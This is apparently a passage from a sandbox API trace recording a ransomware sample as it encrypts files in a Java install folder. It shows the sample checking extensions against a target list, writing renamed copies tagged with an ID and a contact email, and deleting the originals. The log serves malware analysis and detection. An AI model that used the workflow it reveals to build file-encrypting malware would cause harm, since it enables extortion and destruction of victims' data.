(lpString=".zip") returned 4 [0174.496] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.496] lstrlenW (lpString=".rar") returned 4 [0174.496] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.496] lstrlenW (lpString=".bz2") returned 4 [0174.496] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.496] lstrlenW (lpString=".7z") returned 3 [0174.496] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.496] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.927] lstrlenW (lpString=".dbf") returned 4 [0174.928] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.928] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.928] lstrlenW (lpString=".1cd") returned 4 [0174.951] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.951] lstrlenW (lpString=".jpg") returned 4 [0174.951] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.951] lstrcmpiW (lpString1=".txt", lpString2=".MSPLT") returned 1 [0174.951] lstrlenW (lpString="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 34 [0174.951] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0174.952] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=63933) returned 1 [0174.952] CloseHandle (hObject=0x354) returned 1 [0174.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt")) returned 0x20 [0174.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0174.952] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.952] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0174.952] GetLastError () returned 0x0 [0174.952] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xf9bd, lpOverlapped=0x0) returned 1 [0174.956] WriteFile (in: hFile=0x37c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf9c0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf9c0, lpOverlapped=0x0) returned 1 [0174.958] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.958] WriteFile (in: hFile=0x37c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x118, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x118, lpOverlapped=0x0) returned 1 [0174.958] SetEndOfFile (hFile=0x37c) returned 1 [0174.959] CloseHandle (hObject=0x37c) returned 1 [0174.961] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.961] SetEndOfFile (hFile=0x354) returned 1 [0174.963] CloseHandle (hObject=0x354) returned 1 [0174.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.963] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt")) returned 1 [0174.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.964] lstrlenW (lpString=".doc") returned 4 [0174.964] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0174.964] lstrlenW (lpString=".docx") returned 5 [0174.964] lstrcmpiW (lpString1=".docx", lpString2="X.txt") returned -1 [0174.964] lstrlenW (lpString=".pdf") returned 4 [0174.964] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0174.964] lstrlenW (lpString=".xls") returned 4 [0174.964] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0174.964] lstrlenW (lpString=".xlsx") returned 5 [0174.964] lstrcmpiW (lpString1=".xlsx", lpString2="X.txt") returned -1 [0174.964] lstrlenW (lpString=".ppt") returned 4 [0174.964] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0174.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.964] lstrlenW (lpString=".zip") returned 4 [0174.964] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0174.964] lstrlenW (lpString=".rar") returned 4 [0174.964] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0174.964] lstrlenW (lpString=".bz2") returned 4 [0174.964] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0174.964] lstrlenW (lpString=".7z") returned 3 [0174.964] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0174.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.964] lstrlenW (lpString=".dbf") returned 4 [0174.964] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0174.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.965] lstrlenW (lpString=".1cd") returned 4 [0174.965] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0174.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.965] lstrlenW (lpString=".jpg") returned 4 [0174.965] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0174.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.965] lstrlenW (lpString=".doc") returned 4 [0174.965] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0174.965] lstrlenW (lpString=".docx") returned 5 [0174.965] lstrcmpiW (lpString1=".docx", lpString2="X.txt") returned -1 [0174.965] lstrlenW (lpString=".pdf") returned 4 [0174.965] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0174.965] lstrlenW (lpString=".xls") returned 4 [0174.965] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0174.965] lstrlenW (lpString=".xlsx") returned 5 [0174.965] lstrcmpiW (lpString1=".xlsx", lpString2="X.txt") returned -1 [0174.965] lstrlenW (lpString=".ppt") returned 4 [0174.965] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0174.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.965] lstrlenW (lpString=".zip") returned 4 [0174.965] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0174.965] lstrlenW (lpString=".rar") returned 4 [0174.965] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0174.965] lstrlenW (lpString=".bz2") returned 4 [0174.965] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0174.965] lstrlenW (lpString=".7z") returned 3 [0174.965] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0174.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.966] lstrlenW (lpString=".dbf") returned 4 [0174.966] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0174.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.966] lstrlenW (lpString=".1cd") returned 4 [0174.966] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0174.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0174.966] lstrlenW (lpString=".jpg") returned 4 [0174.966] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0174.966] lstrcmpiW (lpString1=".txt", lpString2=".MSPLT") returned 1 [0174.966] lstrlenW (lpString="THIRDPARTYLICENSEREADME.txt") returned 27 [0174.966] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0174.966] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=145180) returned 1 [0174.966] CloseHandle (hObject=0x354) returned 1 [0174.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt")) returned 0x20 [0174.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.967] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0174.967] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.967] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.967] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0174.967] GetLastError () returned 0x0 [0174.967] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x2371c, lpOverlapped=0x0) returned 1 [0174.972] WriteFile (in: hFile=0x37c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x23720, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x23720, lpOverlapped=0x0) returned 1 [0174.976] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.976] WriteFile (in: hFile=0x37c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x10a, lpOverlapped=0x0) returned 1 [0174.976] SetEndOfFile (hFile=0x37c) returned 1 [0174.977] CloseHandle (hObject=0x37c) returned 1 [0174.982] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.982] SetEndOfFile (hFile=0x354) returned 1 [0174.984] CloseHandle (hObject=0x354) returned 1 [0174.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.985] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt")) returned 1 [0174.985] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.985] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.985] lstrlenW (lpString=".doc") returned 4 [0174.985] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0174.985] lstrlenW (lpString=".docx") returned 5 [0174.985] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0174.985] lstrlenW (lpString=".pdf") returned 4 [0174.985] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0174.985] lstrlenW (lpString=".xls") returned 4 [0174.985] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0174.985] lstrlenW (lpString=".xlsx") returned 5 [0174.985] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0174.985] lstrlenW (lpString=".ppt") returned 4 [0174.985] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0174.985] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.985] lstrlenW (lpString=".zip") returned 4 [0174.985] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0174.985] lstrlenW (lpString=".rar") returned 4 [0174.985] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString=".bz2") returned 4 [0174.986] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString=".7z") returned 3 [0174.986] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0174.986] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.986] lstrlenW (lpString=".dbf") returned 4 [0174.986] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.986] lstrlenW (lpString=".1cd") returned 4 [0174.986] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.986] lstrlenW (lpString=".jpg") returned 4 [0174.986] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.986] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.986] lstrlenW (lpString=".doc") returned 4 [0174.986] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString=".docx") returned 5 [0174.986] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0174.986] lstrlenW (lpString=".pdf") returned 4 [0174.986] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString=".xls") returned 4 [0174.986] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0174.986] lstrlenW (lpString=".xlsx") returned 5 [0174.986] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0174.986] lstrlenW (lpString=".ppt") returned 4 [0174.986] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0174.986] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.986] lstrlenW (lpString=".zip") returned 4 [0174.986] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0174.987] lstrlenW (lpString=".rar") returned 4 [0174.987] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0174.987] lstrlenW (lpString=".bz2") returned 4 [0174.987] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0174.987] lstrlenW (lpString=".7z") returned 3 [0174.987] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0174.987] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.987] lstrlenW (lpString=".dbf") returned 4 [0174.987] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0174.987] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.987] lstrlenW (lpString=".1cd") returned 4 [0174.987] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0174.987] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0174.987] lstrlenW (lpString=".jpg") returned 4 [0174.987] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0174.987] lstrcmpiW (lpString1=".html", lpString2=".MSPLT") returned -1 [0174.987] lstrlenW (lpString="Welcome.html") returned 12 [0174.987] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0174.988] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=955) returned 1 [0174.988] CloseHandle (hObject=0x354) returned 1 [0174.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html")) returned 0x20 [0174.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.988] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0174.988] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.988] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.988] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0174.988] GetLastError () returned 0x0 [0174.988] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x3bb, lpOverlapped=0x0) returned 1 [0175.017] WriteFile (in: hFile=0x37c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x3c0, lpOverlapped=0x0) returned 1 [0175.018] ReadFile (in: hFile=0x354, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0175.018] WriteFile (in: hFile=0x37c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0175.018] SetEndOfFile (hFile=0x37c) returned 1 [0175.018] CloseHandle (hObject=0x37c) returned 1 [0175.020] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.020] SetEndOfFile (hFile=0x354) returned 1 [0175.021] CloseHandle (hObject=0x354) returned 1 [0175.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0175.021] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html")) returned 1 [0175.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.022] lstrlenW (lpString=".doc") returned 4 [0175.022] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0175.022] lstrlenW (lpString=".docx") returned 5 [0175.022] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0175.022] lstrlenW (lpString=".pdf") returned 4 [0175.022] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0175.022] lstrlenW (lpString=".xls") returned 4 [0175.022] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0175.022] lstrlenW (lpString=".xlsx") returned 5 [0175.022] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0175.022] lstrlenW (lpString=".ppt") returned 4 [0175.022] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0175.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.022] lstrlenW (lpString=".zip") returned 4 [0175.022] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0175.022] lstrlenW (lpString=".rar") returned 4 [0175.022] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0175.022] lstrlenW (lpString=".bz2") returned 4 [0175.022] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0175.022] lstrlenW (lpString=".7z") returned 3 [0175.022] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0175.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.022] lstrlenW (lpString=".dbf") returned 4 [0175.022] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0175.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.022] lstrlenW (lpString=".1cd") returned 4 [0175.022] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0175.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.022] lstrlenW (lpString=".jpg") returned 4 [0175.022] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0175.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.023] lstrlenW (lpString=".doc") returned 4 [0175.023] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0175.023] lstrlenW (lpString=".docx") returned 5 [0175.023] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0175.023] lstrlenW (lpString=".pdf") returned 4 [0175.023] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0175.023] lstrlenW (lpString=".xls") returned 4 [0175.023] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0175.023] lstrlenW (lpString=".xlsx") returned 5 [0175.023] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0175.023] lstrlenW (lpString=".ppt") returned 4 [0175.023] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0175.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.023] lstrlenW (lpString=".zip") returned 4 [0175.023] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0175.023] lstrlenW (lpString=".rar") returned 4 [0175.023] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0175.023] lstrlenW (lpString=".bz2") returned 4 [0175.023] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0175.023] lstrlenW (lpString=".7z") returned 3 [0175.023] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0175.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.023] lstrlenW (lpString=".dbf") returned 4 [0175.023] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0175.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0175.023] lstrlenW (lpString=".1cd") returned 4 [0175.023] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0175.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 